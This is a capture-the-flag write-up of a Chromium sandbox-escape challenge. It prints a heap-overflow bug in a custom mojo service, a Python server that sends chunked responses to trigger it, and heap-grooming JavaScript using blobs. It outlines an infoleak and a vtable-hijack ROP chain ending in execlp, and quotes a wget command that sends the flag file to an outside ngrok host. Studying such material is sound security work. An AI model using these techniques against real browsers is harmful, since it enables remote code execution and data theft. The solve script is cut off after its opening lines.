Originally I looked at this challenge 2 years ago in PicoCTF 2023, but didn't manage to solve it in time. I was able to find the heap overflow vulnerability during the competition, but the rest of the challenge was too daunting for me to approach so I decided not to work on it. 2 years later I came back to look at the challenge again. The motivating factor for me was that nobody had posted a public writeup about the intended solution and I wanted to explore chromium exploitation.
#
challenge explorationThe provided diff is quite large and implements quite a few new features. The full diff is available below for reference.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334
diff --git a/content/browser/BUILD.gn b/content/browser/BUILD.gn
index 258a8b0ff4f73..898712edb9151 100644
--- a/content/browser/BUILD.gn
+++ b/content/browser/BUILD.gn
@@ -1381,6 +1381,8 @@ source_set("browser") {
"origin_trials/critical_origin_trials_throttle.h",
"origin_trials/origin_trials_utils.cc",
"origin_trials/origin_trials_utils.h",
+ "otter/otter_broker_service_impl.cc",
+ "otter/otter_broker_service_impl.h",
"payments/installed_payment_apps_finder_impl.cc",
"payments/installed_payment_apps_finder_impl.h",
"payments/payment_app_context_impl.cc",
diff --git a/content/browser/browser_interface_binders.cc b/content/browser/browser_interface_binders.cc
index d76825db14850..5ec6d9fb74b50 100644
--- a/content/browser/browser_interface_binders.cc
+++ b/content/browser/browser_interface_binders.cc
@@ -774,6 +774,9 @@ void PopulateFrameBinders(RenderFrameHostImpl* host, mojo::BinderMap* map) {
map->Add<blink::mojom::NotificationService>(base::BindRepeating(
&RenderFrameHostImpl::CreateNotificationService, base::Unretained(host)));
+ map->Add<blink::mojom::OtterBrokerService>(base::BindRepeating(
+ &RenderFrameHostImpl::CreateOtterBrokerService, base::Unretained(host)));
+
map->Add<network::mojom::P2PSocketManager>(
base::BindRepeating(&BindSocketManager, base::Unretained(host)));
diff --git a/content/browser/otter/otter_broker_service_impl.cc b/content/browser/otter/otter_broker_service_impl.cc
index e69de29bb2d1d..cc6b767bec6e9 100644
--- a/content/browser/otter/otter_broker_service_impl.cc
+++ b/content/browser/otter/otter_broker_service_impl.cc
@@ -0,0 +1,168 @@
+#include "content/browser/otter/otter_broker_service_impl.h"
+
+#include "content/browser/renderer_host/render_frame_host_impl.h"
+#include "content/browser/url_loader_factory_params_helper.h"
+#include "services/network/public/mojom/url_loader_factory.mojom.h"
+
+#include <iostream>
+
+namespace content {
+
+constexpr net::NetworkTrafficAnnotationTag kTrafficAnnotation =
+net::DefineNetworkTrafficAnnotation("otter_notif", "OTTER");
+
+OtterBrokerServiceImpl::OtterBrokerServiceImpl(base::WeakPtr<RenderFrameHostImpl> frame_ptr): frame_{std::move(frame_ptr)} {
+ auto* frame = frame_.get();
+ auto params = URLLoaderFactoryParamsHelper::CreateForFrame(
+ frame, frame->GetLastCommittedOrigin(),
+ frame->GetIsolationInfoForSubresources(),
+ frame->BuildClientSecurityState(),
+ /**coep_reporter=*/mojo::NullRemote(), frame->GetProcess(),
+ network::mojom::TrustTokenRedemptionPolicy::kForbid,
+ frame->GetCookieSettingOverrides(), "OtterBrokerServiceImpl");
+
+ params->is_corb_enabled = false;
+
+ frame_->GetProcess()->CreateURLLoaderFactory(
+ url_loader_factory_.BindNewPipeAndPassReceiver(),
+ std::move(params)
+ );
+}
+
+OtterBrokerServiceImpl::~OtterBrokerServiceImpl() = default;
+
+void OtterBrokerServiceImpl::QueryRpc(const std::string& method, RpcCallback cb) {
+ mojo::Remote<network::mojom::URLLoader> url_loader;
+ mojo::PendingRemote<network::mojom::URLLoaderClient> url_loader_client;
+ network::ResourceRequest resource_request;
+ mojo::PendingReceiver<network::mojom::URLLoader> url_loader_receiver;
+ GURL::Replacements replacements;
+
+ url_loader_receiver = url_loader.BindNewPipeAndPassReceiver(),
+
+ replacements.SetHostStr(host_);
+ resource_request.url = GURL("http://osec.io/").ReplaceComponents(replacements);
+
+ resource_request.method = net::HttpRequestHeaders::kPostMethod;
+ resource_request.request_initiator = frame_->GetLastCommittedOrigin();
+ resource_request.headers.SetHeader("accept-language", "en-US");
+ resource_request.headers.SetHeader("content-type", "application/json");
+ resource_request.headers.SetHeader("user-agent", "OtterBroker");
+
+ char data[0x80];
+ size_t data_len = std::snprintf(data, sizeof(data), "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":null}", method.c_str());
+ CHECK(data_len < sizeof(data));
+
+ resource_request.request_body = new network::ResourceRequestBody();
+ resource_request.request_body->AppendBytes(data, data_len);
+
+ mojo::MakeSelfOwnedReceiver(
+ std::make_unique<RequestHandlerImpl>(std::move(url_loader), std::move(cb)),
+ url_loader_client.InitWithNewPipeAndPassReceiver()
+ );
+
+ url_loader_factory_->CreateLoaderAndStart(
+ std::move(url_loader_receiver),
+ 0,
+ network::mojom::kURLLoadOptionBlockAllCookies,
+ std::move(resource_request),
+ std::move(url_loader_client),
+ net::MutableNetworkTrafficAnnotationTag(kTrafficAnnotation)
+ );
+
+}
+
+void AfterGetSlot(OtterBrokerServiceImpl::GetSlotCallback callback, const std::vector<uint8_t> data) {
+ if (data.size() == 0) {
+ std::move(callback).Run(0);
+ } else {
+ std::move(callback).Run(atoi((char*) data.data()));
+ }
+}
+
+void OtterBrokerServiceImpl::GetSlot(GetSlotCallback callback) {
+ if (!inited_) {
+ mojo::ReportBadMessage("OtterBrokerServiceImpl: Init not yet invoked");
+ std::move(callback).Run(0);
+ return;
+ }
+
+ QueryRpc("getSlot", base::BindOnce(&AfterGetSlot, std::move(callback)));
+}
+
+void OtterBrokerServiceImpl::Init(const std::string& host, InitCallback callback) {
+ if (inited_) {
+ mojo::ReportBadMessage("OtterBrokerServiceImpl: Init already invoked");
+ std::move(callback).Run();
+ return;
+ }
+
+ inited_ = true;
+ host_ = host;
+
+ std::move(callback).Run();
+}
+
+RequestHandlerImpl::RequestHandlerImpl(mojo::Remote<network::mojom::URLLoader> url_loader, OtterBrokerServiceImpl::RpcCallback callback): url_loader_{std::move(url_loader)}, callback_{std::move(callback)} {
+}
+
+RequestHandlerImpl::~RequestHandlerImpl() {
+ if (callback_) {
+ std::move(callback_).Run(std::vector<uint8_t>());
+ }
+}
+
+void RequestHandlerImpl::OnReceiveEarlyHints(network::mojom::EarlyHintsPtr early_hints) {
+}
+
+void RequestHandlerImpl::OnReceiveResponse(
+ network::mojom::URLResponseHeadPtr head,
+ mojo::ScopedDataPipeConsumerHandle body,
+ absl::optional<mojo_base::BigBuffer> cached_metadata) {
+
+ int64_t content_len = head->headers->GetContentLength();
+
+ if (content_len < 0) return;
+
+ auto data = std::make_unique<uint8_t[]>(content_len);
+ uint8_t* ptr = data.get();
+
+ uint32_t num_bytes;
+ MojoResult result;
+ while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
+ if (result == MOJO_RESULT_OK) {
+ ptr += num_bytes;
+ num_bytes = content_len;
+ }
+ }
+
+ char start[] = "{\"jsonrpc\":\"2.0\",\"result\":";
+ char end[] = ",\"id\":0}";
+
+ size_t amt_read = (size_t) (ptr - data.get());
+ if (amt_read <= sizeof(start) + sizeof(end)) {
+ std::move(callback_).Run(std::vector<uint8_t>());
+ } else {
+ std::move(callback_).Run(std::vector<uint8_t>(data.get() + sizeof(start), ptr - sizeof(end)));
+ }
+}
+
+void RequestHandlerImpl::OnReceiveRedirect(const net::RedirectInfo& redirect_info,
+network::mojom::URLResponseHeadPtr head) {
+ url_loader_->FollowRedirect({}, {}, {}, absl::nullopt);
+}
+
+void RequestHandlerImpl::OnUploadProgress(
+ int64_t current_position,
+ int64_t total_size,
+ network::mojom::URLLoaderClient::OnUploadProgressCallback callback) {
+ CHECK(false);
+}
+
+void RequestHandlerImpl::OnTransferSizeUpdated(int32_t transfer_size_diff) {
+}
+
+void RequestHandlerImpl::OnComplete(const network::URLLoaderCompletionStatus& status) {
+}
+
+}
diff --git a/content/browser/otter/otter_broker_service_impl.h b/content/browser/otter/otter_broker_service_impl.h
index e69de29bb2d1d..cbc6371b64236 100644
--- a/content/browser/otter/otter_broker_service_impl.h
+++ b/content/browser/otter/otter_broker_service_impl.h
@@ -0,0 +1,66 @@
+#ifndef CONTENT_BROWSER_OTTER_OTTER_BROKER_SERVICE_IMPL_H_
+#define CONTENT_BROWSER_OTTER_OTTER_BROKER_SERVICE_IMPL_H_
+
+#include "base/memory/weak_ptr.h"
+#include "mojo/public/cpp/bindings/remote.h"
+#include "third_party/blink/public/mojom/otter/otter_broker.mojom.h"
+#include "services/network/public/mojom/url_loader.mojom.h"
+#include "services/network/public/mojom/url_loader_factory.mojom.h"
+
+namespace content {
+
+class RenderFrameHostImpl;
+
+class OtterBrokerServiceImpl final
+ : public blink::mojom::OtterBrokerService {
+ public:
+ using RpcCallback = base::OnceCallback<void(std::vector<uint8_t>)>;
+
+ OtterBrokerServiceImpl(base::WeakPtr<RenderFrameHostImpl> frame);
+ ~OtterBrokerServiceImpl() override;
+
+ void Init(const std::string& host, InitCallback callback) override;
+ void GetSlot(GetSlotCallback callback) override;
+
+ void QueryRpc(const std::string& method, RpcCallback cb);
+
+ private:
+ bool inited_ = false;
+ std::string host_;
+ const base::WeakPtr<RenderFrameHostImpl> frame_;
+ mojo::Remote<network::mojom::URLLoaderFactory> url_loader_factory_;
+};
+
+class RequestHandlerImpl: public network::mojom::URLLoaderClient {
+ public:
+ RequestHandlerImpl(mojo::Remote<network::mojom::URLLoader> url_loader, OtterBrokerServiceImpl::RpcCallback callback);
+ ~RequestHandlerImpl() override;
+
+ void OnReceiveEarlyHints(network::mojom::EarlyHintsPtr early_hints) override;
+
+ void OnReceiveResponse(
+ network::mojom::URLResponseHeadPtr head,
+ mojo::ScopedDataPipeConsumerHandle body,
+ absl::optional<mojo_base::BigBuffer> cached_metadata) override;
+
+ void OnReceiveRedirect(const net::RedirectInfo& redirect_info,
+ network::mojom::URLResponseHeadPtr head) override;
+
+ void OnUploadProgress(
+ int64_t current_position,
+ int64_t total_size,
+ network::mojom::URLLoaderClient::OnUploadProgressCallback callback) override;
+
+ void OnTransferSizeUpdated(int32_t transfer_size_diff) override;
+
+ void OnComplete(const network::URLLoaderCompletionStatus& status) override;
+
+
+ private:
+ mojo::Remote<network::mojom::URLLoader> url_loader_;
+ OtterBrokerServiceImpl::RpcCallback callback_;
+};
+
+}
+
+#endif
diff --git a/content/browser/renderer_host/render_frame_host_impl.cc b/content/browser/renderer_host/render_frame_host_impl.cc
index 6255ee6071bfd..c092914a0d9da 100644
--- a/content/browser/renderer_host/render_frame_host_impl.cc
+++ b/content/browser/renderer_host/render_frame_host_impl.cc
@@ -10828,6 +10828,13 @@ void RenderFrameHostImpl::CreateNotificationService(
storage_key(), std::move(receiver));
}
+void RenderFrameHostImpl::CreateOtterBrokerService(
+ mojo::PendingReceiver<blink::mojom::OtterBrokerService> receiver) {
+ mojo::MakeSelfOwnedReceiver(
+ std::make_unique<OtterBrokerServiceImpl>(weak_ptr_factory_.GetWeakPtr()),
+ std::move(receiver));
+}
+
void RenderFrameHostImpl::CreateInstalledAppProvider(
mojo::PendingReceiver<blink::mojom::InstalledAppProvider> receiver) {
InstalledAppProviderImpl::Create(*this, std::move(receiver));
diff --git a/content/browser/renderer_host/render_frame_host_impl.h b/content/browser/renderer_host/render_frame_host_impl.h
index 14e281b743ac6..4cfaeb825059a 100644
--- a/content/browser/renderer_host/render_frame_host_impl.h
+++ b/content/browser/renderer_host/render_frame_host_impl.h
@@ -46,6 +46,7 @@
#include "content/browser/buckets/bucket_context.h"
#include "content/browser/can_commit_status.h"
#include "content/browser/network/cross_origin_opener_policy_reporter.h"
+#include "content/browser/otter/otter_broker_service_impl.h"
#include "content/browser/renderer_host/back_forward_cache_impl.h"
#include "content/browser/renderer_host/back_forward_cache_metrics.h"
#include "content/browser/renderer_host/browsing_context_state.h"
@@ -1921,6 +1922,9 @@ class CONTENT_EXPORT RenderFrameHostImpl
void CreateNotificationService(
mojo::PendingReceiver<blink::mojom::NotificationService> receiver);
+ void CreateOtterBrokerService(
+ mojo::PendingReceiver<blink::mojom::OtterBrokerService> receiver);
+
void CreateInstalledAppProvider(
mojo::PendingReceiver<blink::mojom::InstalledAppProvider> receiver);
diff --git a/third_party/blink/public/mojom/BUILD.gn b/third_party/blink/public/mojom/BUILD.gn
index 036aede8f75a8..ee191563ae057 100644
--- a/third_party/blink/public/mojom/BUILD.gn
+++ b/third_party/blink/public/mojom/BUILD.gn
@@ -144,6 +144,7 @@ mojom("mojom_platform") {
"notifications/notification_service.mojom",
"oom_intervention/oom_intervention.mojom",
"opengraph/metadata.mojom",
+ "otter/otter_broker.mojom",
"parakeet/ad_request.mojom",
"payments/payment_app.mojom",
"peerconnection/peer_connection_tracker.mojom",
diff --git a/third_party/blink/public/mojom/otter/otter_broker.mojom b/third_party/blink/public/mojom/otter/otter_broker.mojom
index e69de29bb2d1d..c54e7ad7e7587 100644
--- a/third_party/blink/public/mojom/otter/otter_broker.mojom
+++ b/third_party/blink/public/mojom/otter/otter_broker.mojom
@@ -0,0 +1,6 @@
+module blink.mojom;
+
+interface OtterBrokerService {
+ Init(string host) => ();
+ GetSlot() => (uint64 slot);
+};
The diff adds a OtterBroker mojom service that will send a POST request to a user specified server and parses the response with a custom response handler. Mojo is an IPC system for communicating between the renderer process and the browser process.
More in-depth reading about mojo:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172
void OtterBrokerServiceImpl::QueryRpc(const std::string& method, RpcCallback cb) {
mojo::Remote<network::mojom::URLLoader> url_loader;
mojo::PendingRemote<network::mojom::URLLoaderClient> url_loader_client;
network::ResourceRequest resource_request;
mojo::PendingReceiver<network::mojom::URLLoader> url_loader_receiver;
GURL::Replacements replacements;
url_loader_receiver = url_loader.BindNewPipeAndPassReceiver(),
replacements.SetHostStr(host_);
resource_request.url = GURL("http://osec.io/").ReplaceComponents(replacements);
resource_request.method = net::HttpRequestHeaders::kPostMethod;
resource_request.request_initiator = frame_->GetLastCommittedOrigin();
resource_request.headers.SetHeader("accept-language", "en-US");
resource_request.headers.SetHeader("content-type", "application/json");
resource_request.headers.SetHeader("user-agent", "OtterBroker");
char data[0x80];
size_t data_len = std::snprintf(data, sizeof(data), "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":null}", method.c_str());
CHECK(data_len < sizeof(data));
resource_request.request_body = new network::ResourceRequestBody();
resource_request.request_body->AppendBytes(data, data_len);
mojo::MakeSelfOwnedReceiver(
std::make_unique<RequestHandlerImpl>(std::move(url_loader), std::move(cb)),
url_loader_client.InitWithNewPipeAndPassReceiver()
);
url_loader_factory_->CreateLoaderAndStart(
std::move(url_loader_receiver),
0,
network::mojom::kURLLoadOptionBlockAllCookies,
std::move(resource_request),
std::move(url_loader_client),
net::MutableNetworkTrafficAnnotationTag(kTrafficAnnotation)
);
}
void RequestHandlerImpl::OnReceiveResponse(
network::mojom::URLResponseHeadPtr head,
mojo::ScopedDataPipeConsumerHandle body,
absl::optional<mojo_base::BigBuffer> cached_metadata) {
int64_t content_len = head->headers->GetContentLength();
if (content_len < 0) return;
auto data = std::make_unique<uint8_t[]>(content_len);
uint8_t* ptr = data.get();
uint32_t num_bytes;
MojoResult result;
while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
if (result == MOJO_RESULT_OK) {
ptr += num_bytes;
num_bytes = content_len;
}
}
char start[] = "{\"jsonrpc\":\"2.0\",\"result\":";
char end[] = ",\"id\":0}";
size_t amt_read = (size_t) (ptr - data.get());
if (amt_read <= sizeof(start) + sizeof(end)) {
std::move(callback_).Run(std::vector<uint8_t>());
} else {
std::move(callback_).Run(std::vector<uint8_t>(data.get() + sizeof(start), ptr - sizeof(end)));
}
}
These are the the public functions that are registered for the OtterBroker mojom service. Init
allows the one time configuration of the target server to query and GetSlot
performs the POST query to the target server.
void OtterBrokerServiceImpl::GetSlot(GetSlotCallback callback) {
if (!inited_) {
mojo::ReportBadMessage("OtterBrokerServiceImpl: Init not yet invoked");
std::move(callback).Run(0);
return;
}
QueryRpc("getSlot", base::BindOnce(&AfterGetSlot, std::move(callback)));
}
void OtterBrokerServiceImpl::Init(const std::string& host, InitCallback callback) {
if (inited_) {
mojo::ReportBadMessage("OtterBrokerServiceImpl: Init already invoked");
std::move(callback).Run();
return;
}
inited_ = true;
host_ = host;
std::move(callback).Run();
}
Inside of the provided template/public
folder we are given an index.html file that gives an example of how to communicate with the OtterBroker service:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
<script src="/mojojs/mojo_bindings.js"></script>
<script src="/mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>
<marquee id="txt"></marquee>
<button onclick="updateSlot()">Update Slot!</button>
<script>
const ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);
// This service is NOT in scope. This is merely meant to proxy
// Solana RPC transactions which unfortunately reject requests
// with a set Origin header.
//
// Please do NOT pwn this service. This is irrelevant to the
// challenge.
ptr.init("proxy.ottersec.workers.dev");
const updateSlot = async () => {
const { slot } = await ptr.getSlot();
txt.innerText = slot;
};
</script>
#
vulnerabilityImmediately one part of the response handling code stands out as suspicious:
int64_t content_len = head->headers->GetContentLength();
if (content_len < 0) return;
auto data = std::make_unique<uint8_t[]>(content_len);
uint8_t* ptr = data.get();
uint32_t num_bytes;
MojoResult result;
while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
if (result == MOJO_RESULT_OK) {
ptr += num_bytes;
num_bytes = content_len;
}
}
The code reads the value of the Content-Length
header, allocates a uint8_t
array based on the content length, and then reads the request body into the array. This code is strange because there are many different ways to manipulate the actual size of a response body to be different from the Content-Length
header.
One example of this is the Transfer-Encoding: chunked
header. Instead of sending the body of the response in one block it is chunked into individual blocks with each block specifying its own length. When receiving a response with Transfer-Encoding: chunked
you are not supposed to trust the Content-Length
header. But the OtterBroker response handler doesn't seem to check for this...
We can test this out with a custom python server:
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer as HTTPServer
class Handler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def do_POST(self):
contentlen = int(self.headers.get("Content-Length"))
data = self.rfile.read(contentlen)
dummy_len = 0
payload = b"A" * 0x700
self.send_response(200)
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Content-Length", str(dummy_len))
self.end_headers()
body: bytes = b""
body += f"{len(payload):x}\r\n".encode()
body += payload
body += b"\r\n"
body += b"0\r\n\r\n\r\n"
self.wfile.write(body)
server = HTTPServer(("0.0.0.0", 80), Handler)
server.serve_forever()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
<script src="mojojs/mojo_bindings.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>
<script>
const ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);
ptr.init("localhost");
(async () => {
await ptr.getSlot();
})();
</script>
If we point OtterBroker to our local server and trigger a request, chrome will crash with an error message:
../../base/allocator/partition_allocator/partition_cookie.h(27) Check failed: *cookie_ptr == kCookieValue[i]
Inspecting the chromium source, the path that ends up checking this cookie value looks like this:
PartitionFree -> FreeInlineUnknownRoot -> FreeInline -> FreeNoHooksImmediate -> PartitionCookieCheckValue
FreeNoHooksImmediate ends up calling PartitionCookieCheckValue here.
The kCookieValue is defined here, and is surprisingly set to a static value. Normally cookie values are dynamically generated at runtime to prevent an attacker from being able to bypass the cookie check without leaking the value first. However here no leaks are required since we know the value of the cookie before hand.
#
BLOBSPrior to this, I knew that the solution would have something to do with mojo blobs. Mojo blobs are controlled bits of data that can be allocated through the mojo blob interface. They are also a perfect target for our overflow vulnerability since they are allocated on the same heap as our response buffer. I didn't know anything about what a blob looks like in memory, so I wrote a simple script that would let me find the blobs in memory easily to inspect.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70
<script src="mojojs/mojo_bindings.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script>
let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
Mojo.bindInterface(
blink.mojom.BlobRegistry.name,
mojo.makeRequest(blob_registry_ptr).handle,
"process"
);
let global_blobs = [];
async function getBlob(store, data) {
function Impl() {}
Impl.prototype = {
requestAsReply: async (a, b) => {
return {
data: [1],
};
},
requestAsStream: () => log("hi2"),
requestAsFile: () => log("hi3"),
};
let bytes_provider = new mojo.Binding(
blink.mojom.BytesProvider,
new Impl()
);
let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
bytes_provider.bind(mojo.makeRequest(bytes_provider_ptr));
let blob_ptr = new blink.mojom.BlobPtr();
let blob_req = mojo.makeRequest(blob_ptr);
if (typeof data === "string") {
data = new TextEncoder().encode(data);
// console.log(data.constructor.name);
}
let data_element = new blink.mojom.DataElement();
data_element.bytes = new blink.mojom.DataElementBytes();
data_element.bytes.length = data.length;
data_element.bytes.embeddedData = data;
data_element.bytes.data = bytes_provider_ptr;
let r = await blob_registry_ptr.register(
blob_req,
Math.random().toString(),
"text/data",
"text/data",
[data_element]
);
store.push(blob_ptr);
return blob_ptr;
}
(async () => {
for (let i = 0; i < 1000; i++) {
await getBlob(global_blobs, "R".repeat(0x1000));
}
let data = "LES-AMATEURS";
data += "Z".repeat(0x1000 - data.length);
let blob1 = await getBlob(global_blobs, data);
let blob2 = await getBlob(global_blobs, data);
while (1) {}
})();
</script>
Here we first allocate 1000 blobs to exhaust the allocator of free chunks that share the same size as our blob object. This forces the allocator to begin allocating new chunks from linear memory and guarantees that the new blobs with the LES-AMATEURS
strings will be allocated next to each other. Then we can find the chunks in memory with gdb:
Then we issue find calls for each of the string pointers to locate the actual blob object:
gef> find 0x3c7401993c00
[+] Searching '\x00\x3c\x99\x01\x74\x3c' in whole memory
[+] In (0x3c740193c000-0x3c7401947000 [rw-])
0x3c74019457e0: 00 3c 99 01 74 3c 00 00 00 4c 99 01 74 3c 00 00 | .<..t<...L..t<.. |
gef> find 0x3c7401995000
[+] Searching '\x00\x50\x99\x01\x74\x3c' in whole memory
[+] In (0x3c740193c000-0x3c7401947000 [rw-])
0x3c7401945b60: 00 50 99 01 74 3c 00 00 00 60 99 01 74 3c 00 00 | .P..t<...`..t<.. |
Since we know that heap allocated objects always have a heap cookie, to find the start of the blob we just need to search backwards until we see the cookie value.
gef> tele 0x3c74019457e0-0x80 20
0x3c7401945760|+0x0000|+000: 0x0000000000000000
0x3c7401945768|+0x0008|+001: 0xabababababababab
0x3c7401945770|+0x0010|+002: 0x0dd0fecaefbeadde <- !! heap cookie !!
0x3c7401945778|+0x0018|+003: 0x1eab11ba05f03713 <- !! heap cookie !!
0x3c7401945780|+0x0020|+004: 0x00005c26b2ed2d70 <vtable for storage::BlobDataItem+0x10> -> 0x00005c26ac41f1a0 <storage::BlobDataItem::~BlobDataItem()> -> 0x48535641e5894855
0x3c7401945788|+0x0028|+005: 0xabab000000000001
0x3c7401945790|+0x0030|+006: 0x0000000000000000
0x3c7401945798|+0x0038|+007: 0x0000000000000000
0x3c74019457a0|+0x0040|+008: 0x0000000000000000
0x3c74019457a8|+0x0048|+009: 0x0000000000000000
0x3c74019457b0|+0x0050|+010: 0x0000000000000000
0x3c74019457b8|+0x0058|+011: 0x0000000000000000
0x3c74019457c0|+0x0060|+012: 0x0000000000000000
0x3c74019457c8|+0x0068|+013: 0xabababab00000000
0x3c74019457d0|+0x0070|+014: 0x0000000000000000
0x3c74019457d8|+0x0078|+015: 0x0000000000001000
0x3c74019457e0|+0x0080|+016: 0x00003c7401993c00 -> 0x54414d412d53454c 'LES-AMATEURSZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ[...]'
0x3c74019457e8|+0x0088|+017: 0x00003c7401994c00 -> 0xabababababababab
0x3c74019457f0|+0x0090|+018: 0x00003c7401994c00 -> 0xabababababababab
0x3c74019457f8|+0x0098|+019: 0x0000000000000000
From this dump we can infer the offsets of some of the fields in the blob:
offset 0x00
-> BlobDataItem vtable
offset 0x08
-> refcount
offset 0x58
-> length of the blob
offset 0x60
-> pointer to data
offset 0x68
-> pointer to end of data
offset 0x70
-> pointer to end of data
The other parts of the blob are zeroed so we can just ignore them for now. We also know that the two blobs that contain LES-AMATEURS
are allocated next to each other, the difference between them is the size of the blob object on the heap.
So the size of a blob object on the heap is 0x370
, subtracting 0x10
to account for the heap cookie.
#
exploitation#
infoleakTo get an infoleak, we setup the heap in such a way that a blob can read its own pointers and the vtable of other blobs for a leak. First step is to allocate 2 blobs, BLOB(A)
and BLOB(B)
. The data for BLOB(B)
is located directly under BLOB(B)
on the heap and can be achieved by allocating a run of blobs and freeing them in a certain order.
Then we free BLOB(A)
to leave a hole in the heap.
Now we can reclaim the freed chunk with our response buffer by setting the Content-Length
header to 0x370
.
Using the overflow I showed earlier, we can overwrite the length of BLOB(B)
to a huge number.
Now BLOB(B)
's data can be used to read the heap pointers in BLOB(B)
as well as the vtable pointer of the next blob on the heap for a heap leak and binary leak.
#
ropThe BlobDataItem vtable holds two pointers function pointers:
When the blob is freed it calls the function pointer at vtable + 0x08
. The assembly that is executed is something along the lines of:
We can control the vtable that is used with our overflow and heap leak and also control the function pointer that is called. If we set the function pointer at vtable + 0x08
to a xchg rsp, rax ; ret
gadget we are able to stack pivot into the vtable, which we have full control over. Using the binary leak we can ensure that the vtable contains a rop chain that will be executed as soon as the xchg gadget is called.
#
arbitrary command executionThe chrome binary has a plt reference to execlp
which is a perfect gadget to use for command execution. The [l]
suffix means that argv is passed using variable arguments similar to printf
, and the [p]
suffix means that it will search for the command in PATH
for us. The lack of the [e]
suffix means that we don't need to specify envp
and the libc will use the stored envp
instead.
The rop chain ends up calling:
execlp("sh", "sh", "-c", command)
In our case the command to execute is 'wget "https://999b-2600-1700-9e31-5f0-00-3a.ngrok-free.app/hello/"$(cat /challenge/flag-*)'
to exfiltrate the flag from remote.
#
remote issues#
timeoutsOriginally I was fetching the mojo files with:
But this would fetch so many files that the exploit would take over 3 seconds to fetch all the necessary files. This was an issue since the timeout on remote was only 3 seconds and would kill the exploit before it started executing anything interesting. After spending a bit of time reading the mojo files, I realized that blob_registry.mojom.js
was fetching a large amount of useless files and disabled it by setting mojo.config.autoLoadMojomDeps
to false.
<script>
mojo.config.autoLoadMojomDeps = false;
</script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/data_element.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob.mojom.js"></script>
#
hostingThe other issue was where to actually host the exploit. I could start a local server and use ngrok to expose port 80, but that would serve a warning page to the admin bot and it would never reach my exploit page. I also tried to use fly.io
to host the exploit, but since I wasn't paying for a dedicated ipv4 address it was proxying my responses through an internal service. That internal service would reject my responses that contained both Transfer-Encoding
and Content-Length
headers since technically you are never supposed to have these headers in the same response. Thankfully @drakon
let me borrow his server to host my exploit which let me finally run my exploit against remote and get the flag!
#
FLAGGGGGpicoCTF{1ca2dfee}
#
solve scripts123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305
<html>
<head>
<script src="template/public/mojojs/mojo_bindings.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>
<script>
mojo.config.autoLoadMojomDeps = false;
</script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
